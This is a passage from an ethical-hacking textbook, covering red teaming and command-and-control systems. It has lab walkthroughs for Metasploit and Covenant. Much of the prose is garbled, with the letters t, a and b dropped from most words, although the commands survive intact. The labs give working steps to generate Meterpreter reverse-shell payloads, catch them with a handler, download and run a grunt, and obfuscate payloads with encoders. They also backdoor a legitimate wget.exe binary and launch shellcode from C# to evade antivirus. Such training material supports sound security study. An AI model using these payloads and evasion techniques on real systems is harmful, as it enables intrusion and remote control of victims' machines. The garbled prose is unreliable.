    The individual alerts on their own would not have been as effective without the teams
working together executing real-life tests within the environment and tailoring the alert-
ing and defense strategy to their specific environment. In the end, everyone wins in this
environment, except for maybe the red team, who has to go research new techniques for
threat emulation.
Gray Hat Hacking: The Ethical Hacker’s Handbook
              Summary
              This chapter covers the basics of ethical hacking and red teams. Red teams operated at
              various levels, beginning with vulnerability scanning and going all the way to purple
              team and threat emulation. There are pros and cons to both consultant and corporate
              red teaming, but many individuals switch between the two throughout their careers to
              gain additional experience and adapt to lifestyle changes. As organizations evolve, so do
              their capabilities around detection and response. Adding a purple team component can
              help provide environment-specific detections with higher fidelity using a combination of
              threat intelligence, defense teams, red teams, and engineering teams.

              For Further Reading
              MITRE ATT&CK Navigator mitre-attack.github.io/attack-navigator/
              MITRE ATT&CK attack.mitre.org/
              Pyramid of Pain detect-respond.blogspot.com/2013/03/the-pyramid-of-pain.html
              Penetration Testing Execution Standard (PTES) www.pentest-standard.org/index
              .php/Main_Page

              References
                   1. https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-
                      for-exchange-server/
                   2. https://krebsonsecurity.com/2021/03/a-basic-timeline-of-the-exchange-mass-hack/
  Command and Control (C2)
                                                                             CHAPTER

                                                                                              7
  In this chapter, we cover the following topics:
      • Understanding command and control (C2) systems
      • Payload obfuscation
      • Creating launchers in C#, Go, and Nim
      • Network evasion techniques
      • Endpoint detection and response (EDR) evasion techniques

For hckers, geing ino  nework is only he firs pr of n ck. Wihou eing le
o inercively execue commnds on sysems,  hcker (oh ehicl nd criminl) cn’
rech heir gols. Using C2 ools nd using evsion echniques cn help esers minin
ccess for longer periods of ime nd limi he impc of conrols on he hoss nd ne-
works h my cu heir ck shor.

Command and Control Systems
Once  sysem is compromised, n cker needs o e le o perform furher recon,
execue commnds, eleve privileges, nd move furher cross he nework. One of he
es wys o ccomplish his is wih  C2 sysem. A C2 sysem ypiclly hs n gen
h runs on  compromised hos h receives commnds from n cker, execues he
commnds, nd hen reurns he resuls. Mos C2 sysems hve hree componens: n
gen h runs on he compromised sysem,  server h cs s n inermediry eween
he cker nd he compromised hos, nd  piece of mngemen sofwre h llows
he cker o issue commnds. Agens nd ckers lk o he C2 server wih heir
respecive componens, llowing he cker o send nd receive commnds wihou
ever direcly hving o lk o he compromised sysem.
   Agens cn lk over mny differen proocols, depending on he piece of C2 sofwre,
u common ones re HTTP, HTTPS, DNS, SMB, rw TCP sockes, nd RPC. Once
n cker lunches he gen on he compromised sysem, he gen will check in wih
he server nd send he sic clien deils o he sysem, such s privilege level, user,
nd hosnme. The server will check o see if here re ny wiing sks, nd if here
ren’, he server nd clien will eiher minin n lwys-on connecion, such s wih

Gray Hat Hacking: The Ethical Hacker’s Handbook
              rw TCP sockes or persisen HTTP/HTTPS sockes, or will se up  periodic check-in,
              frequenly clled  beacon time. This econ ime is he ime inervl when he gen will
              rech ou for check-in nd ddiionl sks.
                 Becon imes re imporn for operionl securiy. Too shor  period of ime, nd
              you will e very noisy, u longer imes men fewer commnds you cn execue. The
              choice of ime eween econs should e sed on wh he gols of he es re nd
              wheher or no operionl securiy is  concern. If i isn’  concern,  very shor econ
              ime les you ccomplish more, u if i is, less frequen nd rndomized check-ins mke
              i hrder o see perns h migh cuse you o e deeced. Deecions cn e sed
              on he frequency of check-in (how mny imes over  dy), he volume of rffic sen,
              he rio of send nd receive d, or emps o deec perns. Mny C2 sysems hve
              he concep of jier, or iming vrinces, h cn e pplied o check-in imes o help
              wih evsion.
                 All C2 sysems hve differen feures, u some common ones include he iliy o
              cree gen pylods, he iliy o execue commnds nd ge he resuls, nd he il-
              iy o uplod nd downlod files. There re free versions of C2 ools h re communiy
              suppored, such s Mesploi, PowerShell Empire, nd Covenn. There re lso com-
              mercil ools such s Col Srike nd INNUENDO h hve suppor. Your choice of
              C2 sysem should e diced y your needs.

                                 NOTE New C2 systems are coming out all the time, and others are becoming
                                 unsupported. If you are interested in picking a C2 system based on your
                                 needs, consider checking out the C2 matrix at https://www.thec2matrix.com/
                                 to find what will work best for you.

              Metasploit
              One of he firs C2 sysems h mos users ry is Mesploi. Mesploi is  esing
              frmework h includes ools nd lirries o help develop explois, es hem, use hem,
              nd perform pos-exploiion sks. Mesploi comes in oh  commercil nd n
              open source projec nd is owned y Rpid7. The communiy version is inslled on
              Kli, mking i esy for users o lern on, nd here re even ools like Mesploile
              o c s  vulnerle VM for he free Mesploi Unleshed rining  hps://www
              .offensive-securiy.com/mesploi-unleshed/.
                 Becuse here re so mny quliy uorils like Mesploi Unleshed, we won’ go
              ino ll he sics of Mesploi. Insed, we will focus on he sics of using Mesploi
              for C2.

                                 NOTE All of the labs in this chapter use the systems from the GHH GitHub
                                 repo (https://github.com/GrayHatHacking/GHHv6) in the Ch07 directory.
                                 After running the instructions in the CloudSetup directory, run build.sh
                                 in the Ch07 directory. When it’s complete, we will use the target and Kali
                                 boxes. The credentials for each of the systems can be found in the README
                                 for each chapter.
                                                                                Chapter 7: Command and Control (C2)

Lab 7-1: Creating a Shell with Metasploit

To egin wih, we will cree  Server Messge Block (SMB) shre on he Kli sysem
o drop our pylod. We cn jus use he /mp direcory wih smd on he sysem. Le’s
dd  shre o our configurion nd hen resr he service nd verify h he shre
is ccessile:

                                                                                                                      PART II
└─$ cat addshare.txt | sudo tee -a /etc/samba/smb.conf
[ghh]
   comment = GHH Share
   browseable = yes
   path = /tmp
   printable = no
   guest ok = yes
   read only = yes
   create mask = 0700
└─$ sudo service smbd restart
└─$ smbclient -L localhost
Enter WORKGROUP\kali's password: <press enter>
        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        ghh             Disk      GHH Share
        IPC$            IPC       IPC Service (Samba 4.13.2-Debian)
SMB1 disabled -- no workgroup available

   Now we cn cree our firs pylod wih msfvenom, s shown nex. We wn o cree
 Meerpreer pylod. Meerpreer is he C2 gen for Mesploi, nd we wn his
gen o rech ck ou o our server. This is referred o s  reverse shell. Bind shells lisen
on he sysem he gen is run on, wheres reverse shells rech ou o he server. In mos
cses, orgnizions won’ llow direc connecion o worksions from he Inerne, so
reverse shells re he mos common for ckers o use.
└─$ msfvenom -p windows/meterpreter_reverse_tcp \
  -f exe --platform Windows -o /tmp/msf1.exe
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 175174 bytes
Final size of exe file: 250368 bytes
Saved as: /tmp/msf1.exe
└─$ chmod 755 /tmp/msf1.exe

   We hve jus used msfvenom, Mesploi’s pylod generor, o cree  reverse TCP
Meerpreer shell h is stageless, mening he enire pylod is in he inry. Conversely,
staged mens h only  smll piece of  loder is incorpored in he pylod nd he
res is rerieved from he server. When we wn s smll  pylod s possile, hen
sged is opiml. However, someimes conrols cn see our sger loding, nd his
will give us wy. In mos cses, when size is irrelevn, sged will e eer ecuse
fewer hings cn go wrong wih his ype of pylod. For his inry, we cn ell h
our pylod is sgeless ecuse of he nme of he pylod. In Mesploi, in gen-
erl, he form for pylods is <plform>/<pylod>/<pylod ype> for sged nd
<plform>/<pylod>_<pylod ype> for sgeless. Our sged version of his pylod
would e windows/meerpreer/reverse_cp.
Gray Hat Hacking: The Ethical Hacker’s Handbook
                 Nex, we need o lod he hndler o cch our shell when i clls ck. Mesploi hs
               ool clled hndler o cch pylods. Becuse of he wy Mesploi groups explois
              y plform, nd ecuse he hndler cn cch ny ype of plform, i is in he muli
              direcory. In Mesploi, we need o se our pylod ype o he sme s our msfvenom
              pylod nd hen run he exploit commnd o run i:
              msf6 > use multi/handler
              [*] Using configured payload generic/shell_reverse_tcp
              msf6 exploit(multi/handler) > set payload windows/meterpreter_reverse_tcp
              payload => windows/meterpreter_reverse_tcp
              msf6 exploit(multi/handler) > set LHOST 10.0.0.40
              LHOST => 10.0.0.40
              msf6 exploit(multi/handler) > exploit

              [*] Started reverse TCP handler on 10.0.0.40:4444

                 Now h i is running, we cn remoe o our Windows rge sysem using RDP,
              log in s our rge user, nd open  PowerShell window. PowerShell les us execue
              commnds vi he UNC ph, so we’ll lunch our msf1.exe file off our ghh shre:
              PS C:\Users\target> & \\10.0.0.40\ghh\msf1.exe

                 Bck on our Kli ox, we should see he shell cll ck o he C2 server nd open
               session:
              [*] Meterpreter session 1 opened (10.0.0.40:4444 -> 10.0.0.20:49893) at 2021-
              09-12 05:45:12 +0000

                 Now we cn execue commnds. Meerpreer hs some uil-in commnds h cn
              e seen wih he help commnd. Some frequen sks we my wn o perform include
              geing he user ID h execued he shell using he getuid commnd nd geing  shell
              using he shell commnd:
              meterpreter > getuid
              Server username: GHH\target
              meterpreter > shell
              Process 1200 created.
              Channel 2 created.
              Microsoft Windows [Version 10.0.14393]
              (c) 2016 Microsoft Corporation. All rights reserved.
              C:\Users\target>net localgroup administrators
              net localgroup administrators
              Alias name     administrators
              Comment        Administrators have complete and unrestricted access to the computer/domain
              Members
              -------------------------------------------------------------------------------
              Administrator
              GHH\Domain Admins
              The command completed successfully.
              C:\Users\target>exit
              Exit

                 We hve idenified h we re running s he GHH\rge user nd hve opened 
              shell o look  he locl Adminisrors group using he net commnd. Afer exiing he
              shell, we see our Meerpreer promp ck. Mesploi hs uil-in pos modules for  lo
              of differen civiies. You cn see he pos-exploiion modules y yping run post/ nd
                                                                            Chapter 7: Command and Control (C2)
pressing tab. They re ghered y funcion; for exmple, if we wned o gher logged-
on users, we could use he following module:
meterpreter > run post/windows/gather/enum_logged_on_users
[*] Running against session 3
Current Logged Users
====================
 SID                                            User
 ---                                            ----
 S-1-5-21-449742021-2098378324-3245439462-1111 GHH\target

                                                                                                                  PART II
[+] Results saved in: /home/kali/.msf4/loot/20210912061025_default_10.0.0.20_
host.users.activ_930927.txt

   We cn see our rge user logged in, nd hen we my see ddiionl oupu of users
who hve logged in recenly. To exi, we ype quit o exi our shell nd hen exit -y o
exi Mesploi.
   Mesploi hs mssive mouns of funcionliy, nd enumering ech possiiliy
in his chper isn’ possile. However, wih he Mesploi Unleshed clss nd some of
hese ips, you should e well on your wy o using Mesploi s  pylod generor
nd C2 ool.

PowerShell Empire
PowerShell Empire ws relesed  BSides Ls Vegs y Will Schroeder nd Jusin Wrner
in 2015. Since hen, he GiHu projec hs een rchived, nd  forked version is
eing minined nd improved y BCSecuriy  hps://gihu.com/BC-SECURITY/
Empire. PowerShell Empire is  Pyhon-sed C2 frmework h uses PowerShell-sed
pylods, sgers, nd pos-exploiion modules o perform sks. I uses componens
of PowerSploi, ShrpSploi, nd oher ools in pos-exploiion modules, which mens
h mny of he ools h esers will use re lredy uil in.
   Once Microsof implemened he Animlwre Scn Inerfce (AMSI) nd incresed
PowerShell logging, PowerShell ecme less populr nd C# ools sred gining popu-
lriy. However, Empire now includes AMSI nd Scrip-Block Logging ypsses h cn
help hide from some of he more recen securiy improvemens. We will look in deph 
Empire in Chper 15.

Covenant
Covenn is  C2 frmework wrien in C# h cn run on oh Linux nd Windows.
Wih he populriy of C# in red em civiies, Covenn hs gined in populriy
ecuse i hs nive C# suppor o uild inries nd cn use mny of he populr C#
pos-exploiion ools. In ddiion, he iliy o execue ddiionl C# ssemlies in
memory nd he iliy o exend he frmework esily mkes i simple o dd your
fvorie C# ools ino he frmework for operions.
   Covenn is lso deployle vi Docker nd hs  friendly we inerfce. I ships wih
smple profiles o use for we nd for ridge liseners h cn e used for cusom proo-
cols nd exernl C2. In ddiion, i hs feures h re gre for red ems, such s he
iliy o rck rifcs used on n operion s well s o uild ck grphs h show
he ph  eser ook during n operion.
Gray Hat Hacking: The Ethical Hacker’s Handbook
                                 TIP Covenant has great documentation. For more information about
                                 any feature or for information about in-depth customization of Covenant
                                 payloads, stagers, and more, go to the wiki page at https://github.com/
                                 cobbr/Covenant/wiki.

              Lab 7-2: Using Covenant C2

              To sr Covenn, on he l Kli ox, run he following commnd:
              └─$ sudo covenant-kbx start
              >>> Starting covenant
              Please wait during the start, it can take a long time...
              >>> Opening https://127.0.0.1:7443 with a web browser
              covenant/default started
              Press ENTER to exit

                 Then, in your we rowser, go o hps://<ip of your kli ox>:7443. Once you click
              hrough he SSL wrning, you will e le o se up he firs ccoun on Covenn. Pu
              whever you’d like your usernme nd pssword o e, u pick somehing secure so
              oher folks cn’ use your C2 sysem.
                 The Dshord, shown here, is he firs screen you will come o.

                  Covenn hs some nming convenions h re differen from mny oher C2
              sysems. Gruns re he C2 cliens. A Grun connecs o  Lisener, which is he service
              h is sood up for C2 communicions. Any ime you issue  commnd o  Grun,
              i is considered  Tsk nd is rcked in he Tskings lis, where you cn see wh com-
              mnds hve een sen nd heir reurn vlues. To dd  new Lisener, click he Liseners
              link on he lef nd choose Cree o ge o he Cree Lisener screen.
                                                                             Chapter 7: Command and Control (C2)

                                                                                                                   PART II
   For he HpProfile field, we choose CusomHpProfile nd hen need o fill in some
ddiionl fields. The firs is Nme; he deful nme isn’ esily rememerle, so le’s
nme i hp1. The BindAddress field is ll zeros ecuse we wn i o ccep ny IP ddress
h is on he hos mchine, u we do need o chnge he ConnecAddresses field. This is
he ddress h cliens will connec o, nd y deful i will hve one of he Docker IPs,
so we need o se i o he inernl IP ddress for Kli, 10.0.0.40. Nex, we click he Cree
uon o sr he Lisener. When we look on he Liseners , i should show h he
hp1 Lisener is “Acive,” mening his Lisener ws se up correcly.
   Our nex sep is o cree  wy of geing he rge o e le o run our inry.
For his, we will go o he Lunchers  on he lef nd choose he Binry opion. The
Binry Luncher screen will e displyed for us o ener our relevn informion ino.
Gray Hat Hacking: The Ethical Hacker’s Handbook
                 For he Lisener field, we choose hp1 nd leve everyhing else he sme, excep
              for he DoNeVersion, which we se o Ne40. The version of DoNe is imporn
              ecuse older sysems my no hve DoNe 4.0, nd newer sysems my no hve
              DoNe 3.5. Doing  i of recon on he rge efore choosing he pylod ype my
              e helpful here. Becuse we know h our rge ox is Windows Server 2016, we cn
              sfely choose he Ne40 opion. Once we click he Genere uon, he pylod will
              e genered inside he pplicion, even hough here won’ e feedck, u now we
              need o ge i o our rge.
                 Nex, we see he Binry Luncher screen. In he Hos field, we cn specify  locion
              o hos our inry. To mke i esy, we will jus specify he locion s /grunt1.exe nd
              hen click Hos.

              You won’ ge ny feedck, u he file is now hosed. You cn go o he Liseners ,
              click your lisener, nd hen click Hosed Files o vlide h he file is eing hosed if
              you hve prolems.
                 To execue he Grun on our rge ox, go o  PowerShell promp nd downlod
              nd execue he Grun:
              PS C:\Users\target> iwr http://10.0.0.40/grunt1.exe -o grunt1.exe
              PS C:\Users\target> .\grunt1.exe

                 When you do his, n ler my riefly pop up on he op righ of he rowser o show
              h you hve  new Grun. To view he Grun, go o he Gruns  nd click he nme
              of he new Grun.
                 The Info , shown nex, hs sic informion ou he compromised sysem. We
              know h i is n HTTP Grun running s he GHH\rge user on WS20 wih n
              IP ddress of 10.0.0.20. We hve he OS version, when he connecion ws eslished,
              nd he ls check-in ime. This gives us he sic informion ou he helh nd con-
              ex of he Grun, u i’s rrely wh we’ll wn o do. To perform our pos-exploiion
              civiies, we need o go o he Tsk .
                                                                           Chapter 7: Command and Control (C2)

                                                                                                                 PART II
   The Tsk  shows he vrious uil-in modules Covenn hs h we cn run.
Choosing  sk will show he opions for h sk. To jus undersnd he sics, we re
going o run he WhoAmI module h ges he curren user conex. We lredy sw his
from he Grun Info screen, u we cn esily verify h informion wih his module.

   When we run he sk, he Inerc window is displyed. We see he commnd eing
sen, u i kes  few momens for he response o come ck. This is ecuse our
Grun isn’  rel-ime Grun nd insed hs  econ inervl. Wih his inervl, i my
ke up o 10 seconds o respond (5 seconds for he Grun o check in nd ge he reques
nd hen 5 more seconds efore i reurns he response). This is ecuse our Luncher
dely ws se  5 seconds.
Gray Hat Hacking: The Ethical Hacker’s Handbook
                  As you cn see, mny sks cn e run wihin Covenn, nd we cover mny of hose
              echniques in Chpers 16 nd 17.
                  The res of he ls in his chper use Mesploi for pylods for he ske of simplic-
              iy, u you could use Covenn insed. When you re done wih Covenn, issue he
              following commnd in Kli o shu down he server:
              └─$ sudo covenant-kbx stop
              covenant/default stopped
              Press ENTER to exit

              Payload Obfuscation
              One of our igges chllenges s ehicl hckers is how o sy hed of common conrols.
              Mny criminls will use cusom ools o sy hed of hese conrols, u frequenly we
              don’ hve he ime o cree cusom sofwre for differen ess. Mny of he nivirus
              (AV) vendors re looking  he pulicly ville ools nd uilding deecions for hem,
              so i’s imporn o know ips nd ricks o chnge our pylods in differen wys so we
              cn use hose ools wihou immediely geing cugh.

              msfvenom and Obfuscation
              We lredy looked  using msfvenom o uild  sic pylod, u msfvenom hs  on
              of differen feures o help rnsform he pylods uil ino he ool. msfvenom hs
              encoders h will help encode he pylod using differen echniques o ry o evde AV
              signure-sed deecion. There is lso n ierion coun h cn e used o encode he
              pylod muliple imes o cree ddiionl vriions from he originl pylod.

              Lab 7-3: Obfuscating Payloads with msfvenom

              For his l, we’re going o look  differen encoding nd ofuscion mehods h cn
              e used wih msfvenom o hide pylods. For he firs exmple, we’ll ke  look  using
              encoding o chnge he ppernce of he pylod iself. To do his, we will use he com-
              mon encoding “shik_g_ni,” which in Jpnese roughly rnsles o “nohing cn e
              done ou i.”
                 To egin wih, le’s look  some of he srings h re pr of Meerpreer from our
              iniil msf1.exe genered in L 7-1. These srings re pr of he oken mnipulion
              funcionliy, nd we cn use his funcionliy o rck he Meerpreer hiding for
              fuure inries:
              └─$ strings /tmp/msf1.exe | grep -i token
              OpenProcessToken
              AdjustTokenPrivileges
              OpenThreadToken
                                                                          Chapter 7: Command and Control (C2)
   We see he funcion nmes for opening process nd hred okens s well s djusing
privileges. Nex, le’s dd some encoding o see wh h looks like:
└─$ msfvenom -p windows/meterpreter_reverse_tcp -f exe -e x86/shikata_ga_nai \
   -i 3 --platform Windows -o /tmp/msf2.exe
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 3 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 175203 (iteration=0)
x86/shikata_ga_nai succeeded with size 175232 (iteration=1)

                                                                                                                PART II
x86/shikata_ga_nai succeeded with size 175261 (iteration=2)
x86/shikata_ga_nai chosen with final size 175261
Payload size: 175261 bytes
Final size of exe file: 250368 bytes
Saved as: /tmp/msf2.exe

   We specify he ddiionl opions of -e wih our encoder ype nd -i wih he numer
of ierions we wn o run. We cn see i encoding hree imes nd wriing ou he
inry. If you wned o use  differen encoder, msfvenom -l encoders will show you
opions. Noice ech one is prepended wih he plform of he encoder ype, nd here
we’re genering x86 inries. When we run our strings commnd gin, we don’ ge
nyhing ck, showing h he ex in he Meerpreer pylod iself is ofusced:
└─$ strings /tmp/msf2.exe | grep -i token
┌──(kali kali)-[/tmp]

  When we look  he inries, hough, we see h hey re he sme size:
└─$ ls -l /tmp/msf*
-rwxr-xr-x 1 kali kali 250368 Sep 12 05:39 /tmp/msf1.exe
-rw-r--r-- 1 kali kali 250368 Sep 13 06:04 /tmp/msf2.exe

This is ecuse he emples for hese inries re idenicl. This isn’ opiml, s i
mkes he size  good indicor. One hing we cn do is choose  Windows inry h
we migh e le o use s  emple h would e differen. Kli hs some Windows
inries in he sysem lredy, so le’s use he wge.exe inry s our emple:
└─$ msfvenom -p windows/meterpreter_reverse_tcp -f exe -e x86/shikata_ga_nai
\
   -i 3 --platform Windows -o /tmp/msf3.exe \
   -x /usr/share/windows-binaries/wget.exe
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
<snipped>
x86/shikata_ga_nai chosen with final size 175261
Error: No .text section found in the template

   The error is ecuse msfvenom ries o injec he pylod ino he .ex secion of
he inry, nd if h secion doesn’ exis, we hve  prolem. Le’s ke  look  he
secions h re in he inry for wge.exe:
└─$ objdump -h /usr/share/windows-binaries/wget.exe
/usr/share/windows-binaries/wget.exe:     file format pei-i386
Gray Hat Hacking: The Ethical Hacker’s Handbook
              Sections:
              Idx Name                      Size      VMA       LMA       File off   Algn
                0 UPX0                      00070000 00401000 00401000 00000400      2**2
                                            CONTENTS, ALLOC, CODE
                  1 UPX1                    0004b000 00471000 00471000 00000400      2**2
                                            CONTENTS, ALLOC, LOAD, CODE, DATA
                  2 UPX2                    00000200 004bc000 004bc000 0004b400      2**2
                                            CONTENTS, ALLOC, LOAD, DATA

                 The inry is pcked wih UPX, so here isn’  ex heder. The exe-only ype for
              msfvenom, hough, will overwrie he code o dd msfvenom wihou requiring  .ex
              secion. When we run i gin, i works:
              └$ msfvenom -p windows/meterpreter_reverse_tcp -f exe-only -e x86/shikata_ga_nai \
                 -i 3 --platform Windows -o /tmp/msf3.exe \
                 -x /usr/share/windows-binaries/wget.exe
              [-] No arch selected, selecting arch: x86 from the payload
              <snipped>
              Payload size: 175261 bytes
              Final size of exe-only file: 308736 bytes
              Saved as: /tmp/msf3.exe

                 One of he side effecs of his echnique is h wget won’ cully ry o do hings i
              normlly would, so someone migh ecome suspicious. We cn use he -k flg o keep
              funcionliy in he inry. Le’s mke  new inry wih he -k flg:
              └─$ msfvenom -p windows/meterpreter_reverse_tcp -f exe -e x86/shikata_ga_nai \
                 -i 3 --platform Windows -o /tmp/msf4.exe \
                 -x /usr/share/windows-binaries/wget.exe -k
              [-] No arch selected, selecting arch: x86 from the payload
              <snipped>
              Saved as: /tmp/msf4.exe

                This worked wih he exe ype ecuse i is injecing  new secion heder o hold he
              code. Le’s ke  look  he objdump oupu:
              └─$ objdump -h /tmp/msf4.exe
              /tmp/msf4.exe:     file format pei-i386
              Sections:
              Idx Name          Size      VMA       LMA       File off               Algn
                0 UPX0          00070000 00401000 00401000 00000400                  2**2
                                CONTENTS, ALLOC, LOAD, CODE
                1 UPX1          0004b000 00471000 00471000 00000400                  2**2
                                CONTENTS, ALLOC, LOAD, CODE, DATA
                2 UPX2          00000200 004bc000 004bc000 0004b400                  2**2
                                CONTENTS, ALLOC, LOAD, DATA
                3 .text         0002add4 004bd000 004bd000 0004b600                  2**2
                                CONTENTS, ALLOC, LOAD, CODE

                Oky, so now h we hve  few inries, le’s mke hem execule nd lunch 
              msfconsole o cch our shells:
              └─$ chmod 755 /tmp/*.exe
              └─$ msfconsole -q
              msf6 > use multi/handler
              [*] Using configured payload generic/shell_reverse_tcp
                                                                            Chapter 7: Command and Control (C2)
msf6 exploit(multi/handler) > set payload windows/meterpreter_reverse_tcp
payload => windows/meterpreter_reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.0.0.40
LHOST => 10.0.0.40
msf6 exploit(multi/handler) > set ExitonSession false➊
ExitonSession => false
msf6 exploit(multi/handler) > exploit -j❷
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 10.0.0.40:4444

                                                                                                                  PART II
    We hve dded wo new specs o our commnd. The firs is seing he
ExitonSession vlue o false ➊. Typicl ehvior is o sop lisening once we ge our
firs shell ck. In our cse, we wn o cch muliple shells o ry ech of our inries.
The oher ehvior we wn o fix is immediely going ino  session once  shell con-
necs ck. To do his, we specify -j ❷ wih he exploit commnd o ell Mesploi
we wn i o run in he ckground s  jo. Now when we ge shells, we will see 
messge sying  new shell conneced, u we won’ hve o immediely inerc wih
i. Now le’s go ck o our Windows ox nd run some of our new shells:
PS C:\> cd \\10.0.0.40\ghh
PS Microsoft.PowerShell.Core\FileSystem::\\10.0.0.40\ghh> .\msf2.exe
PS Microsoft.PowerShell.Core\FileSystem::\\10.0.0.40\ghh> .\msf3.exe

   On our Kli ox, we see wo shells connec, u on he Windows ox, he firs shell
gives us conrol ck immediely while he second hngs. The msf3 inry is our
wge.exe inry h hs hd he code pched o run our shell insed, wheres he
msf2 inry is our encoded sic .exe file from msfvenom. Le’s ccess our session from
he msf3 inry nd exi ou of he Kli ox:
[*] Meterpreter session 2 opened (10.0.0.40:4444 -> 10.0.0.20:65501) at 2021-
09-13 06:44:52 +0000
msf6 exploit(multi/handler) > sessions -i 2
[*] Starting interaction with 2...
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 10.0.0.20 - Meterpreter session 2 closed. Reason: User exit

   We used he sessions commnd o inerc wih he open session 2, nd we see he
Meerpreer promp where we ype exit. Bck on he Windows ox, conrol hs reurned.
On our Windows ox, le’s ry running he msf4.exe inry, which is using wge.exe wih
he -k flg o keep funcionliy:
PS ::\\10.0.0.40\ghh> .\msf4.exe
msf4: missing URL
Usage: msf4 [OPTION]... [URL]...
Try `msf4 --help' for more options.
PS ::\\10.0.0.40\ghh> .\msf4.exe http://scanme.nmap.org
--06:50:06-- http://scanme.nmap.org/
           => `index.html'
Resolving scanme.nmap.org... 45.33.32.156
Connecting to scanme.nmap.org[45.33.32.156]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Gray Hat Hacking: The Ethical Hacker’s Handbook
                 When we firs run he inry, i shows n error messge indicing we need o specify
               URL. This is he ypicl wget funcionliy, u we don’ ge  shell ck ecuse he
              inry never mde i o our shellcode. When we ry gin wih  URL, we see wget rying
              o downlod  file o our SMB shre, u i cn’ wrie. On our Mesploi console we
              should see somehing like his:
              [*] Meterpreter session 3 opened (10.0.0.40:4444 -> 10.0.0.20:49176) at 2021-
              09-13 06:50:06 +0000
              [*] 10.0.0.20 - Meterpreter session 3 closed. Reason: Died

                  The session died righ wy ecuse when he inry finished, i killed off our shell
              s well. We could reques  relly ig pge so h i kes  long ime, u we hve
              ddiionl opions. In he dvnced opions (which cn e shown for ny pylod vi
              --list-options) is n opion for PrependMigrate, which will dd  migrion o  new
              process  he eginning of he code, mking our shell live longer hn he process iself.
              Le’s uild one of hose nd ry i:
              └─$ msfvenom -p windows/meterpreter_reverse_tcp -f exe -e x86/shikata_ga_nai \
                 -i 3 --platform Windows -o /tmp/msf5.exe \
                 -x /usr/share/windows-binaries/wget.exe -k PrependMigrate=true
              [-] No arch selected, selecting arch: x86 from the payload
              <snipped>
              Saved as: /tmp/msf5.exe
              ┌──(kali kali)-[/tmp]
              └─$ chmod 755 /tmp/msf5.exe

                On our Windows ox, when we run msf5.exe, we should see he sme oupu s
              msf4.exe, u in Mesploi we see somehing differen:
              msf6 exploit(multi/handler) > [*] Meterpreter session 4 opened
              (10.0.0.40:4444 -> 10.0.0.20:49250) at 2021-09-13 06:57:31 +0000
              msf6 exploit(multi/handler) > sessions -i 4
              [*] Starting interaction with 4...
              meterpreter > getpid
              Current pid: 3704
              meterpreter > ps
              Process List
              ============
               PID   PPID Name                      Arch Session User          Path
               ---   ---- ----                      ---- ------- ----          ----
              <snipped>
              3532 836     ShellExperienceHost.exe x64   2        GHH\target C:\Windows\
              SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
               3704 3444 rundll32.exe               x86    2       GHH\target C:\Windows\
              SysWOW64\rundll32.exe

                 The process h our shellcode is running in is no msf5.exe u insed rundll32
              .exe. Our inry spwned  new process nd injeced ino i, leving our session up, even
              hough msf5.exe finished. Wih hese echniques, we cn eer hide Mesploi pylods
              in oher inries wih ddiionl ofuscion o ry o keep signure-sed AV engines
              from deecing hem. We hve more opions hn jus he emples for msfvenom,
              hough. Le’s look  some lernive sregies.
                                                                            Chapter 7: Command and Control (C2)
Creating C# Launchers
The deful lunchers wih Mesploi nd oher C2 ools re frequenly deeced y AV,
endpoin deecion nd response (EDR), nd oher securiy ools. To com his, mny
ehicl hckers nd criminls use shellcode lunchers o help hide heir shellcode. These
lunchers cn use differen echniques o lunch he shellcode, including injecing ino
oher processes, using encrypion, nd  vriey of oher echniques or cominions of
echniques o look differen enough o securiy conrols o no e esily deeced.

                                                                                                                  PART II
    C# hs mny perns h hve een creed for lunching shellcode, including frme-
works like ShrpSploi h cn e included s lirries in oher ools h hve muliple
wys o lunch shellcode h cn e used hrough funcions. The exensiiliy nd il-
iy o include funcions from exernl DLLs wrien in C++ nd oher lnguges mke
i esy o use he higher-level funcionliy of C# o do he ulk of he lifing for he
luncher while swiching o C++ funcions wih sysem DLLs o perform specific sks.

Lab 7-4: Compiling and Testing C# Launchers

One of he mos sic wys of lunching shellcode is y plcing i in  hred. A thread
is  se of code h runs concurrenly wih noher piece of code. When we lunch he
code in  hred, eiher in our curren process or in noher process, he min ody of he
pplicion keeps running while our shellcode runs  he sme ime.
    For his l, we’re going o keep using he Mesploi muli/hndler seup from he
previous l nd dd he shellcode o  emple. In he Kli insnce is  shells sudirec-
ory. When looking in h direcory, we see he wo files we re going o e using for
his l: uild_cshrp.sh nd cshrp.emple. The emple file hs he ody of he code
wih  su o inser our shellcode.
    The uild_cshrp.sh scrip conins he msfvenom commnd o cree  64-i
Meerpreer reverse TCP shell h connecs ck o our hndler nd hen compiles he
resuling code wih he Mono C# compiler, mcs. The resuling wo files re he cshrp.cs
file nd  cshrp_dropper.exe file in /mp. Le’s ke  look  he emple file:
UInt32 scAddress = ❶VirtualAlloc(0,(UInt32)shellcode.Length,
MEM_COMMIT, PAGE_READWRITE);
❷Marshal.Copy(shellcode, 0, (IntPtr)(scAddress), shellcode.Length);
uint prot;
❸VirtualProtect((IntPtr)(scAddress), shellcode.Length, PAGE_EXECUTE, out prot);
IntPtr hThread = IntPtr.Zero;
UInt32 threadId = 0;
IntPtr pinfo = IntPtr.Zero;
❹hThread = CreateThread(0, 0, scAddress, pinfo, 0, ref threadId);
WaitForSingleObject(hThread, 0xFFFFFFFF);

   Our C# code egins  ❶, where we cree memory h is he size of our shellcode.
Th memory is empy, so  ❷, we copy he conens of our shellcode ino i. In order
o execue i, he memory hs o e mrked execule, nd VirtualProtect ❸ does h
for us. From here,  ❹, we cree  hred h runs he shellcode. Finlly, we wi for
h shellcode o finish wih he WaitForSingleObject commnd, nd once i finishes,
Gray Hat Hacking: The Ethical Hacker’s Handbook
              he progrm cn exi. Now h we hve nlyzed wh i does, le’s uild i using he
              following commnds:
              └─$ ./build_csharp.sh
              No encoder specified, outputting raw payload
